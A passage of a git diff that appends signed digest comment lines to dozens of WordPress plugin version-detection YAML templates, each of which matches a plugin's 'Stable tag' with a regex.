a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008589d1aae19b56791ce5bc70dbf22425e64a85f611bb2f26f9248c9a59f1b0bb022100b0119257c103bad8d81a35abeac0b2c38408551eaf932e48e7bbd0e3d6995ab3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index c984479bde..fd5eca6efc 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fb03c21390a02b0ae4f40a425839122b4ed652ba55d751f00b6725def1488a33022017e3825d9bc6756c6f7f80091034a46c8877fa1080f8d1d8f176479e37f1501f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index a3870175c7..de1b1a6259 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c080f3ba053dfe914f01cac260418d77338ee431bcf44f23b4fa5ec6c92ea77c022023243d159639b5adfd3a7e8dadeee0da0aa18bcec13c7fc9e07c0f585e71caf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index f5f3818ea2..24a0d0b972 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b550d88ff0c2a7fe812b09cf496e8895fcdadd9019b0028690306696b6cc05c1022100ea4f611a03192117113c189a0186a8784698af06fe0bdc47eb2d4be7b140bfb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 7e5b54c12c..417c4b753c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022001268a8155228d28456c0f9ef4be3e9d2fef3d8069bdd8f0362781947317910402203b341d8932d201bf9e253dff5b0d9bc8e4523c72ea9a2b601c3fc05767137596:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 59effd09f6..2bcb21f357 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200474526d53d6a55aa692e0778be891e532465de11337427dc0f33a4226c840e5022100cd61d7076854216876a1b2b86e183fded17b95d6d38b649a914619c612e70232:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 833207dcff..387962c587 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022027d00990bf60a758c42300b3b2cb9030dbeeac240dc86880444fadd3790d0a720220517163c8b542a91ca10fb273d731cb2fd4c96174caddf288d2b7f22e960cc66c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index b7ea2d38d1..26b2d3560c 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022069cd527c2959bdfca7754c3d0d9058f12be483ea83c6d94935edd13360182dc2022100f3e4b3f63ba043290ca2112bdd7bf083652c68eaed0fba70af533346cd975a40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..f5658d2193 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203380a395d21423bd7e4f6d210a65b112383b713536f817c9f02016360fae4f900220150d3c5119fe0bc253c881504c75b1c41cd9bbaced50ffa7be3c0c34db26252f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..f710d55c61 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022019fcade195804318fb3cae62b23dfbc0c266e8c89877a01cc6fdc3cd23130636022062376848d6e2dcda093738c90cb3587a89959f7f4d4bcf5c9547753c3709244b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb7..0cb5ff31cc 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022047591fb9b5e6d02d68dd974015b945979a5cbf5a8af40f90373098e936f2f84602205ea1f5a0b909a8d7a0a72c8d712b0bed9cb397dd6c81a15984ccbfd0d0abea96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..8d2de6afdc 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220585826e501c52addd57a80749c62aecf2771a4d9a5509b39d225c3d282b96ceb022100c1c7fd22b9e1dd2563208facd2e5dcb84e9e8fbe96f5b32b04e3d768f3f534c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..5562789db6 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cac128f93ab2a0af1d2b171dbb19ed807ad24ad734cd0f172f662e4ed2ff032702200b7730205e9885388010467e8bfd6e08fb6e6313e594218046427975a05abf55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..4544ab56be 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009708159ed6d4335255d8bd75179fb075f5c74eb5fd6b94e415f936f7eb5c01e10220277b3557715644694504b1086eae7632d8bec9d9f4bdb13872820c1987c9a362:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..9e7e469e4d 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100abbd4c45a0eead187c7c9c8749de488de68bfa80c7db55f2f2309ef3010a403b022100ba3b9a0f73945d823161a9f92924c9ef0da942dcfa039ef351fe99408145b5dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..f684144e28 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022043916162dcbb7ec1037686a0674b0e74103a99219b790a8c9c1142d98bbe972e022100cffea2799f8c5b12c06df34658477bc13d57f68b4046a086c8596c8b7804d080:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..b9e78bc0c9 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207d279e60e1630c929e3dbe927c7e1889c09bf9e77d9632a97aa1c30ff322a080022100e11f77a0cc80220fc8848865a8b6e679208e33f6c105d6e74bcf9c684b2f192f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..3f35c7a21d 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c11331d52e40784aa14b7d131fec0abe61a0be72fb0bb1c28ece8668e6c6254102204a12f51cd5277a43289711d6c270ef80f3247368856f1d1b51fe8542d83501c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..cfb03963c0 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220724cc4a28fdc2276856db3d1e9fd9aa00365f7d363b295773cac1fe6d2405729022065080102dc9dc613cae9a78af31a04e4c8ffed272a87283b0c05fdaaebdd41ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..72d0ad262b 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dac6afe6525dafb4ae90db8cbabaac1912bbf1b2b8407974de674bf1b882409f02202102b5e065d07ca8faffb4eaf712175b64fff9940196d0f11ca8206a40b6c5dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index eda1d27f04..c9d763a5ec 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cd5d5682f58b6e96defb10693dc7171d531d131b77a58db4600a1cd66482aa44022100b7390f7a32f3258fca1a6c612d0c0630f889216f0e870a11d4366f236a2dd352:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..83cfe8a597 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f2c348791e669750175494451364029547f7d165045021d4f578f056cd6ec1af02203f982be3e73274e85ce0a91c1603c0a549f13976f6dc33cc5c5829fa3c7e2767:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea69..1cc21593b2 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022019791e8499c4431581c69f22b064701625d5dd73715b51935681023a28c3ffc902207a7402a359a2b147e9d08659ad9b3658906f013ab04ae23203819a68c46df46b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..df53cd6e49 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a65a6c8a1264a89a2e97a76dc9c1d9bf4202370a7e810644a4ae80bbb5a4cbe5022066422ce85b9cb08fafed713f5af65dd099ddab280e85dde9aed419cada1e8418:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..9e4adfa5c8 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a74c1ec6247d18be9ae88fdbf8ade365ef2ea187156a30d6f05a6186e6e617600220479de4e97099e2ae5377dda47eb439c69053c8985712789628ad7ede51acd9bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..80fcb5d9cd 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b71d99347cad40bcd0a68f16bdb950d2b87b61d089e9609c0b99f086268452c502210099e97f75f151b0482d15ba8e81b73a8d8604bec15ca07304c37fcee03692232d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..38e8ef29cb 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ba6b54e7a2c6c5fb6e50f2ac132b97793342af07fa21fc70f357e72f88f975b402206eabb1ae7811d6b6cc467e2ac79bc413d16b00e45c4f9345afb6dfc974762106:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..07aff9a14b 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d421769f143d3e8b223166aa2cd15f6e66796429e92ff0f28baf4d0ca6190b9e02206f15df3c6b894bb3424542e0d81055c6f36f2598b01e8fb8f7e81b3705e16e99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..cecb6e406c 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202095ae21ae000f943302dae2b164e0d515ec2f824761f97334d78fee154ddab50220596e0f2b656412ae33a8802bf95e667fbb71170d759494cad4568b3f07072700:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..66a2e7895f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b7b3818de2a199603d28dd8e28c3b0f72d3863fec46b221c3c61533d2ae28665022100d9b6bd1c8f07f42b0b62640b61cd5ef959a6550a2db6be25e1d8d3f4513b7be3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..ada0b79d90 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c7a12ab59ec092156811cd2c1d04764c194a289508dda2e817d711030ff1cece02204b26ee87675a3af9cd27c9d35c88098ba6f87dbd6f7a573515b5b2feffed76fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..24f70897b7 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210086ef9ddd2d6ca0635b7d04a7ba28924e6eca809ea70b1bba7049360d9c589d10022100866f7e1f4e66779767e8016a421929e93660edebd6a2fa5c50334f92691002d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..2d37b28baa 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022002e95b8f937b9b4fa3c8fb1c58bb8bea8c3235a73baacca5f9d2b0e747125e67022100ea8e59fa3c9a2cef1d6b1e4ef332e54a08c054e8a256acc32fe052805154ccf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..35e9da5f68 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d2917db74300aa01becfddd880c3886b81f46d6aba1fb3ad3c3b841d1f909e2602200f4c4734a4c6f90617f83f1ac253101daf9dfc948fd260b12f8efe6bb295c602:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..5365dd7958 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ad7ebb9ff7c226176020665a2bce9babb8c5f612f0ec042145adcd361d0e52e50220520b44a88a86bd6ec9c958f2f352a7fbc08093f2ba63c01619988100a9aebf21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..9d8d807e95 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009de938022a8653834e9d75719373bb65b6c6d6a761497321944cc4d2fe3ccb9302204bfa65c6b953e43d91e3fc09d52344cbeadcfede7ad249a2a3f41efe68cf7fd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..273aca0c16 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100836cdd0a20a576bf6628cb82489352e3970db82d7e518e37322a2861c424c22f022012494a44e4e12c2dd32e304155e0a39e9e119f3ac3f8eed52fb8489f2ad78a1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..a5059e2dc1 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207ff24949f73009a3a0f93686055039906d8b2f411b58e06431d390891a7bbd9a022021b9ce449db0a3289f435508072fe513a78fea18dffac591f758ec87b4b1b60b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d1..bb431d417d 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204df5f0f63459edae76afc76cd21359a7d2b5045f201385d4df7ba1808acb649f0220523dacd33ce38899320c7cea7fd1702d905cc1488dba38f9bb6d3c8dc076bb8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..133d1f95ef 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dcc798f3e5ff0c479a782f74fcf60812311e8ebae5af3a3eba791f650f538bc3022100a416ba0ebc0a7ddb70a51bedf4e4b7b9d4132c4bd3b2a0335cea5b231aa82b79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..703130c6e9 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c743d8a173bcef619c60ed4aa5130a7fed8d964eb51a854db21c537312870250022000d0aa585359c41c67c4926648174b0a699cf003a1f42b01578274ba85d6f3c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..deedafdd5e 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009e034ea5c0e2f76f67fb6a13801af869484fd8b8d5a2766336dd19c12d5f4d6c0220423d79f1da2cc5053be587dbd52cb7a5a1325af021e45673396b30a98fcaf5e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..ac44a1059e 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022019aeafcb5f72e792b5d388858b06602c89b81611bb61606554d6ff76e0d793b902210091669cdc5e8243af828f1e8a36b53c63f3c29aee7240d752da349de8ad48f909:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..916e7c8f69 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022055f57921d1ff6c55fc2c3ea71008e2085998aa588595799fbd86af45cf88195d022100bef325040c1ea0dc4c0baa992eecf11bd5a85486ecab1617000e0624042c0326:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 00eb1e2dfc..2d621a6bbc 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022036ce592e64cc9eb3d4e6380a02d1588f6f6cec8c8211965b62e5f1cc8dd05760022100a52b463701852c6620fa020661d666c4f6e60846e488f5b8e57a0361221bad38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..984384e528 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205f5f1af07e2ffa4e64fa5ec707eb805830756d3b5d30f5f53a989b426724691a02204b622da48739753ef29346ba57bf47cf089f79f027fb7807573055b9cb22d44d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db68..88dcb57f68 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ae70926afbca91fe98eba48df5c9c50d1e2e31ee4e376bc6445c93d7a29b0efd0220562edab7ce1cb1ba9e30d8f4495c48eb179db4127969cbf1ffa9d18366b94f32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..ced345b335 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 